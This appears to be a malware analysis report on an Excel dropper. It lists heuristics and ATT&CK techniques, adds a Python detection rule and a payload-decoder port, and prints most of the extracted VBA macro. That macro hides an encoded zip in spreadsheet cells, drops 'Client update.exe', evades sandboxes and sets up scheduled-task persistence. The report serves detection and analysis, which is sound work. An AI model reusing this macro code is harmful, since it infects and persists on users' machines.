Verdict: MALICIOUS
Risk Score: 268

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The critical heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER fires on the Workbook_open macro, which runs automatically when the workbook is opened. Contrary to the generic heuristic text, this sample keeps its CreateObject calls in plain sight and does not download anything. It assembles the environment-variable names and the drop path from split string literals (Environ("us" & "er" & "name") yields the user name; the drop directory is C:\Users\<username>\vals), reads an encoded blob from cells Z100:Z111 of a sheet named "Sheet1 " (trailing space, distinct from the visible decoy sheet "Sheet1", which the macro swaps in while hiding the payload sheet), and decodes it two characters per byte as byte = (Asc(c1) - 67) + (Asc(c2) - 67) * 16, so the characters 'C'..'R' encode the low and high nibbles. The decoded bytes are written to %TEMP%\testfile.zip and extracted into the drop directory with Shell.Application CopyHere (option 20 = no progress dialog plus yes-to-all); the dropped file name is built from the string "firefox" and resolves to "Client update.exe". The crtt function then registers a scheduled task through a COM object whose ProgID is hidden behind a helper inv() that is not in the preview; the member calls that follow (Connect, GetFolder, NewTask, RegistrationInfo, Principal, Settings, Triggers.Create) match the Task Scheduler 2.0 Schedule.Service interface. The Application.MouseAvailable test is a simple sandbox check: without a mouse the drop and persistence code is skipped. This is an embedded-payload dropper with task-scheduler persistence, consistent with the ClamAV Xls.Dropper name, not a second-stage downloader.
Heuristics (7)

- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Dropper.Agent-7571548-0
- OLE_VBA_MACROS (medium, 5 related findings): Document contains VBA macro code
- OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER (critical): Obfuscated auto-exec VBA loader. Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- OLE_VBA_WBOPEN (high): Workbook_Open macro
- OLE_VBA_CREATEOBJ (high): CreateObject call
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE_VBA_ENVIRON (low): Environ() call (env variable access)
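The loader heuristic above combines three ingredients: an auto-exec entry point, a custom string decoder, and a COM or execution sink. The following scanner is an added example (not the analyzer's own rule code) that checks decoded VBA source for that combination plus split string literals such as "us" & "er" & "name"; the rule names, regexes and thresholds are this example's own choices, and the two macro snippets it runs on are constructed stand-ins, not the extracted source.

```python
"""Triage rule for the obfuscated auto-exec loader shape (added example)."""
import re

# Auto-exec entry points for Excel and Word documents.
AUTOEXEC = re.compile(
    r"\b(Workbook_Open|Workbook_Activate|Auto_Open|AutoOpen|Document_Open|AutoExec)\b", re.I)

# COM instantiation, execution and raw file-write sinks.
SINKS = {
    "CreateObject": re.compile(r"\bCreateObject\s*\(", re.I),
    "Shell": re.compile(r"\bShell\s*\(", re.I),
    "ExecMethod": re.compile(
        r"\.(Run|Exec|ShellExecute|CopyHere|RegisterTaskDefinition)\s*[(\s]", re.I),
    "BinaryWrite": re.compile(r"\bOpen\b.*\bFor\s+Binary\b", re.I),
}

# Decoder shapes: per-character arithmetic, hex-string decode, junk-token Replace.
DECODERS = {
    "CharArithmetic": re.compile(r"Asc\s*\(\s*Mid\s*\([^)]*\)\s*\)\s*[-+*]\s*\d+", re.I),
    "HexDecode": re.compile(r'Val\s*\(\s*"&H"\s*&|&H[0-9A-F]{2}', re.I),
    "ReplaceJunk": re.compile(r'Replace\s*\([^,]+,\s*"[^"]{1,12}"\s*,\s*""\s*\)', re.I),
}
# Numeric char-array decoders: many Chr()/ChrW() calls or a long Array(1, 2, 3, ...).
CHR_CALL = re.compile(r"\bChr[W$]?\s*\(", re.I)
NUMERIC_ARRAY = re.compile(r"\bArray\s*\(\s*\d+(?:\s*,\s*\d+){7,}", re.I)
CHR_THRESHOLD = 5  # example threshold, not the analyzer's

# "us" & "er": short literals glued together to defeat plain substring matching.
SPLIT_LITERALS = re.compile(r'"[^"]{1,6}"\s*&\s*"[^"]{1,6}"')


def triage(vba: str) -> dict:
    """Return matched indicators and a verdict for one decoded VBA module."""
    autoexec = sorted({m.group(1).lower() for m in AUTOEXEC.finditer(vba)})
    sinks = sorted(name for name, rx in SINKS.items() if rx.search(vba))
    decoders = sorted(name for name, rx in DECODERS.items() if rx.search(vba))
    if len(CHR_CALL.findall(vba)) >= CHR_THRESHOLD or NUMERIC_ARRAY.search(vba):
        decoders.append("NumericCharArray")
    split_literals = len(SPLIT_LITERALS.findall(vba))

    if autoexec and sinks and decoders:
        verdict = "OBFUSCATED_AUTOEXEC_LOADER"  # the critical shape
    elif autoexec and sinks:
        verdict = "AUTOEXEC_WITH_SINK"
    elif autoexec or sinks or decoders:
        verdict = "SUSPICIOUS"
    else:
        verdict = "CLEAN"
    return {"autoexec": autoexec, "sinks": sinks, "decoders": decoders,
            "split_literals": split_literals, "verdict": verdict}


# Constructed stand-in for the decoded macro: a few representative lines,
# enough to exercise each rule (not the full extracted source).
SAMPLE_VBA = r'''Private Sub Workbook_open()
un = Environ("us" & "er" & "name")
lineText = ActiveWorkbook.Sheets("Sheet1 ").Range("Z100").Value
While counter < lst
dec(counter \ 2) = Asc(Mid(lineText, counter, 1)) - 67 + (Asc(Mid(lineText, counter + 1, 1)) - 67) * 16
counter = counter + 2
Wend
Set f = CreateObject("Scripting.FileSystemObject")
Open Environ("Temp") & "\testfile.zip" For Binary Lock Read Write As #fileNo
Set SA = CreateObject("Shell.Application")
SA.Namespace(savep & "\").CopyHere SA.Namespace(Environ("Temp") & "\testfile.zip").items, 20
End Sub
'''

# Constructed benign macro for contrast.
BENIGN_VBA = '''Sub FormatReport()
    ActiveSheet.Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, triage(src))
```

Run it against the output of `olevba` (the decoded source is what the regexes expect); the p-code-only case the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic covers needs a token scan of the compiled stream instead, which this source-level rule does not attempt.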
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5746 bytes | 53c14314dd7ee32b7caf2a857e484801086b81f5bd18b5511e700088211b8fad |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
'Dim cellRange As Range
'Set cellRange = ActiveSheet.Range("B5:F5")
'For i = 1 To 5
' MsgBox cellRange.Cells(1, i).Value
'Next
Dim name As String
Dim save As String
Dim savep As String
Dim un As String
un = Environ("us" & "er" & "name")
savep = "C:\" & "Users\" & un & "\vals"
name = "firefox"
Dim lineText As String
lineText = ActiveWorkbook.Sheets("Sheet1 ").Range("Z100").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z101").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z102").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z103").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z104").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z105").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z106").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z107").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z108").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z109").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z110").Value
lineText = lineText & ActiveWorkbook.Sheets("Sheet1 ").Range("Z111").Value
'example1
Dim lst As Long
Dim counter As Long
Dim length As Long
length = 1
lst = Len(lineText)
Dim dec() As Byte
'resize to n means n+1 byte
ReDim Preserve dec(lst / 2 - 1)
counter = 1
While counter < lst
dec(counter \ 2) = Asc(Mid(lineText, counter, length)) - 67 + (Asc(Mid(lineText, counter + 1, length)) - 67) * 16
counter = counter + 2
Wend
save = "Client" & " update." & Mid(name, 4, 1) & Mid(name, 7, 1) & Mid(name, 4, 1)
'example2
If Application.MouseAvailable Then
Set f = CreateObject("Scripting.FileSystemObject")
If Not f.FileExists(savep & "\" & save) Then
If Dir(savep, vbDirectory) = "" Then
On Error Resume Next
MkDir savep
End If
Dim fileNo As Integer
fileNo = FreeFile
On Error Resume Next
Open Environ("Temp") & "\testfile.zip" For Binary Lock Read Write As #fileNo
Put #fileNo, 1, dec
Close #fileNo
'unz
Set SA = CreateObject("Shell.Application")
SA.Namespace(savep & "\").CopyHere SA.Namespace(Environ("Temp") & "\testfile.zip").items, 20
c = crtt(savep, save, un)
End If
ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetHidden
'ActiveWorkbook.save
End If
End Sub
Function crtt(savep, save, un)
Dim dom As String
dom = Environ("user" & "domain")
Set s = CreateObject(inv("ivres.elude"))
'its important
Call s.Connect
'not important
Set f = s.getFolder("\")
Set n = s.NewTask(0)
'it is not me
Set r = n.RegistrationInfo
r.Author = "MS"
'and may not
r.Description = "CheckUpdate"
Set p = n.Principal
p.LogonType = 3
'hehehehe
With n.settings
.Enabled = True
.runonlyifidle = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
'1 for tie trigger, 9 for at logon
Set t = n.triggers.Create(1)
t.Enabled = True
t.ID = "TID"
'4 min from now
t.startBoundary = XmlTime(DateAdd("n
... (truncated)
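To recover the embedded payload without running the macro, the decoder loop in Workbook_open can be ported directly. The script below is an added example (not code from the report or from the sample): it reproduces the two-characters-per-byte scheme, byte = (Asc(c1) - 67) + (Asc(c2) - 67) * 16, concatenates Z100..Z111 in the macro's order, checks for the zip header the macro expects, and rebuilds the "Client update.exe" file name from "firefox". The cell contents it decodes are constructed here from a stand-in zip; with a real workbook you would read those twelve cells from the "Sheet1 " sheet and pass them in the same dictionary shape.

```python
"""Port of the Workbook_open cell decoder (added example, constructed input)."""
import io
import zipfile

BASE = 67                                              # ord("C"), the constant the macro subtracts
ALPHABET = "".join(chr(BASE + n) for n in range(16))   # "CDEFGHIJKLMNOPQR" encodes 0..15
CELLS = [f"Z{row}" for row in range(100, 112)]         # Z100..Z111, read in that order


def decode_payload(text: str) -> bytes:
    """dec(i \\ 2) = (Asc(c1) - 67) + (Asc(c2) - 67) * 16, pair by pair.

    An odd trailing character is ignored, as the While counter < lst loop does.
    """
    out = bytearray()
    for i in range(0, len(text) - 1, 2):
        lo, hi = ord(text[i]) - BASE, ord(text[i + 1]) - BASE
        if not (0 <= lo < 16 and 0 <= hi < 16):
            raise ValueError(f"character outside decoder alphabet at offset {i}")
        out.append(lo + hi * 16)
    return bytes(out)


def encode_payload(data: bytes) -> str:
    """Inverse of decode_payload; used here only to build the constructed cells."""
    return "".join(ALPHABET[b & 0xF] + ALPHABET[b >> 4] for b in data)


def join_cells(cells: dict) -> str:
    """Concatenate Z100..Z111 in the macro's order; a missing cell reads as ''."""
    return "".join(cells.get(c, "") for c in CELLS)


def drop_name(name: str = "firefox") -> str:
    """save = "Client" & " update." & Mid(name, 4, 1) & Mid(name, 7, 1) & Mid(name, 4, 1)."""
    return "Client" + " update." + name[3] + name[6] + name[3]


def recover_zip(cells: dict) -> dict:
    """Decode the cells and return the members of the zip the macro writes to %TEMP%\\testfile.zip."""
    data = decode_payload(join_cells(cells))
    if not data.startswith(b"PK\x03\x04"):
        raise ValueError("decoded blob does not start with a zip local file header")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {member: zf.read(member) for member in zf.namelist()}


def build_sample_cells() -> dict:
    """Constructed input: a zip holding a stand-in 'Client update.exe', spread over 12 cells."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(drop_name(), b"MZ stand-in bytes, not a real PE")
    encoded = encode_payload(buf.getvalue())
    step = -(-len(encoded) // len(CELLS))          # ceiling division
    return {cell: encoded[i * step:(i + 1) * step] for i, cell in enumerate(CELLS)}


if __name__ == "__main__":
    members = recover_zip(build_sample_cells())
    for member, blob in members.items():
        print(f"{member}: {len(blob)} bytes, starts with {blob[:2]!r}")
```

The alphabet check matters in practice: the macro silently produces garbage for any cell text outside 'C'..'R', so a decode that raises here usually means the cell order or the sheet (the trailing-space "Sheet1 ", not the decoy "Sheet1") was wrong.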